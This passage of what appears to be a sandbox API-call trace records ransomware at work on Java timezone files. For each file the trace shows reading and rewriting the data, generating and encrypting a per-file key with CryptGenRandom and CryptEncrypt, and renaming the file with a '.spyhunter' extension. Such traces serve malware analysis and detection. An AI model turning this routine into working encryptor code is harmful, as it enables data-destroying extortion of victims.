lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf784*=0x41, lpOverlapped=0x0) returned 1 [0125.707] GetProcessHeap () returned 0x2c0000 [0125.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.707] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.707] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x25cf7c4*, lpNumberOfBytesWritten=0x25cf784*=0x4, lpOverlapped=0x0) returned 1 [0125.707] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf784, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf784*=0x30, lpOverlapped=0x0) returned 1 [0125.707] CloseHandle (hObject=0x170) returned 1 [0125.707] GetProcessHeap () returned 0x2c0000 [0125.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.708] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda.spyhunter") returned 67 [0125.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Luanda.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\luanda.spyhunter")) returned 1 [0125.708] GetProcessHeap () returned 0x2c0000 [0125.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.708] GetProcessHeap () returned 0x2c0000 [0125.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.708] GetProcessHeap () returned 0x2c0000 [0125.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8b00 | out: hHeap=0x2c0000) returned 1 [0125.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7c0 | out: pbBuffer=0x25cf7c0) returned 1 [0125.709] GetProcessHeap () returned 0x2c0000 [0125.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7b8*=0x30) returned 1 [0125.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.710] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome") returned 55 [0125.710] StrStrW (lpFirst="Lome", lpSrch=".txt") returned 0x0 [0125.710] GetProcessHeap () returned 0x2c0000 [0125.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.710] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf77c*=0x1b, lpOverlapped=0x0) returned 1 [0125.711] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.711] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf77c*=0x1b, lpOverlapped=0x0) returned 1 [0125.711] GetProcessHeap () returned 0x2c0000 [0125.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.711] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.712] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7bc*, lpNumberOfBytesWritten=0x25cf77c*=0x4, lpOverlapped=0x0) returned 1 [0125.712] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf77c*=0x30, lpOverlapped=0x0) returned 1 [0125.712] CloseHandle (hObject=0x170) returned 1 [0125.712] GetProcessHeap () returned 0x2c0000 [0125.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.712] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome.spyhunter") returned 65 [0125.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lome.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lome.spyhunter")) returned 1 [0125.713] GetProcessHeap () returned 0x2c0000 [0125.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.713] GetProcessHeap () returned 0x2c0000 [0125.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.713] GetProcessHeap () returned 0x2c0000 [0125.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f268a8 | out: hHeap=0x2c0000) returned 1 [0125.713] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7c0 | out: pbBuffer=0x25cf7c0) returned 1 [0125.713] GetProcessHeap () returned 0x2c0000 [0125.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.713] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7b8*=0x30) returned 1 [0125.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.714] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville") returned 61 [0125.714] StrStrW (lpFirst="Libreville", lpSrch=".txt") returned 0x0 [0125.714] GetProcessHeap () returned 0x2c0000 [0125.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.714] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf77c*=0x41, lpOverlapped=0x0) returned 1 [0125.715] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.715] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf77c*=0x41, lpOverlapped=0x0) returned 1 [0125.715] GetProcessHeap () returned 0x2c0000 [0125.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.715] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.716] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7bc*, lpNumberOfBytesWritten=0x25cf77c*=0x4, lpOverlapped=0x0) returned 1 [0125.716] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf77c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf77c*=0x30, lpOverlapped=0x0) returned 1 [0125.716] CloseHandle (hObject=0x170) returned 1 [0125.716] GetProcessHeap () returned 0x2c0000 [0125.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.716] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville.spyhunter") returned 71 [0125.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Libreville.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\libreville.spyhunter")) returned 1 [0125.717] GetProcessHeap () returned 0x2c0000 [0125.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.717] GetProcessHeap () returned 0x2c0000 [0125.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.717] GetProcessHeap () returned 0x2c0000 [0125.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba688 | out: hHeap=0x2c0000) returned 1 [0125.717] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7b8 | out: pbBuffer=0x25cf7b8) returned 1 [0125.717] GetProcessHeap () returned 0x2c0000 [0125.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7b0*=0x30) returned 1 [0125.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos") returned 56 [0125.718] StrStrW (lpFirst="Lagos", lpSrch=".txt") returned 0x0 [0125.718] GetProcessHeap () returned 0x2c0000 [0125.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.718] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf774*=0x41, lpOverlapped=0x0) returned 1 [0125.719] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.719] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf774*=0x41, lpOverlapped=0x0) returned 1 [0125.719] GetProcessHeap () returned 0x2c0000 [0125.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.719] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.719] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x25cf7b4*, lpNumberOfBytesWritten=0x25cf774*=0x4, lpOverlapped=0x0) returned 1 [0125.720] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf774*=0x30, lpOverlapped=0x0) returned 1 [0125.720] CloseHandle (hObject=0x170) returned 1 [0125.720] GetProcessHeap () returned 0x2c0000 [0125.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.720] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos.spyhunter") returned 66 [0125.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos.spyhunter")) returned 1 [0125.721] GetProcessHeap () returned 0x2c0000 [0125.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.721] GetProcessHeap () returned 0x2c0000 [0125.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.721] GetProcessHeap () returned 0x2c0000 [0125.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8a40 | out: hHeap=0x2c0000) returned 1 [0125.721] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7b8 | out: pbBuffer=0x25cf7b8) returned 1 [0125.721] GetProcessHeap () returned 0x2c0000 [0125.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.721] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7b0*=0x30) returned 1 [0125.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa") returned 59 [0125.723] StrStrW (lpFirst="Kinshasa", lpSrch=".txt") returned 0x0 [0125.723] GetProcessHeap () returned 0x2c0000 [0125.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.723] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf774*=0x1b, lpOverlapped=0x0) returned 1 [0125.724] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.724] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf774*=0x1b, lpOverlapped=0x0) returned 1 [0125.724] GetProcessHeap () returned 0x2c0000 [0125.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.724] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.724] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x25cf7b4*, lpNumberOfBytesWritten=0x25cf774*=0x4, lpOverlapped=0x0) returned 1 [0125.724] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf774, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf774*=0x30, lpOverlapped=0x0) returned 1 [0125.724] CloseHandle (hObject=0x170) returned 1 [0125.724] GetProcessHeap () returned 0x2c0000 [0125.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.725] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa.spyhunter") returned 69 [0125.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kinshasa.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kinshasa.spyhunter")) returned 1 [0125.725] GetProcessHeap () returned 0x2c0000 [0125.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.726] GetProcessHeap () returned 0x2c0000 [0125.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.726] GetProcessHeap () returned 0x2c0000 [0125.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8980 | out: hHeap=0x2c0000) returned 1 [0125.726] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7b0 | out: pbBuffer=0x25cf7b0) returned 1 [0125.726] GetProcessHeap () returned 0x2c0000 [0125.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.726] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7a8*=0x30) returned 1 [0125.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.727] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali") returned 57 [0125.727] StrStrW (lpFirst="Kigali", lpSrch=".txt") returned 0x0 [0125.727] GetProcessHeap () returned 0x2c0000 [0125.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.727] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf76c*=0x41, lpOverlapped=0x0) returned 1 [0125.728] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.728] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf76c*=0x41, lpOverlapped=0x0) returned 1 [0125.728] GetProcessHeap () returned 0x2c0000 [0125.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.728] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.728] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7ac*, lpNumberOfBytesWritten=0x25cf76c*=0x4, lpOverlapped=0x0) returned 1 [0125.728] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf76c*=0x30, lpOverlapped=0x0) returned 1 [0125.728] CloseHandle (hObject=0x170) returned 1 [0125.729] GetProcessHeap () returned 0x2c0000 [0125.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.729] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali.spyhunter") returned 67 [0125.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Kigali.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\kigali.spyhunter")) returned 1 [0125.730] GetProcessHeap () returned 0x2c0000 [0125.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.730] GetProcessHeap () returned 0x2c0000 [0125.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.730] GetProcessHeap () returned 0x2c0000 [0125.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb88c0 | out: hHeap=0x2c0000) returned 1 [0125.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7b0 | out: pbBuffer=0x25cf7b0) returned 1 [0125.730] GetProcessHeap () returned 0x2c0000 [0125.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7a8*=0x30) returned 1 [0125.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.731] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum") returned 59 [0125.732] StrStrW (lpFirst="Khartoum", lpSrch=".txt") returned 0x0 [0125.732] GetProcessHeap () returned 0x2c0000 [0125.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.732] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf76c*=0x151, lpOverlapped=0x0) returned 1 [0125.733] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.733] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x151, lpNumberOfBytesWritten=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf76c*=0x151, lpOverlapped=0x0) returned 1 [0125.733] GetProcessHeap () returned 0x2c0000 [0125.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.733] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.733] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7ac*, lpNumberOfBytesWritten=0x25cf76c*=0x4, lpOverlapped=0x0) returned 1 [0125.733] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf76c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf76c*=0x30, lpOverlapped=0x0) returned 1 [0125.733] CloseHandle (hObject=0x170) returned 1 [0125.734] GetProcessHeap () returned 0x2c0000 [0125.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.734] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum.spyhunter") returned 69 [0125.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Khartoum.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\khartoum.spyhunter")) returned 1 [0125.735] GetProcessHeap () returned 0x2c0000 [0125.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 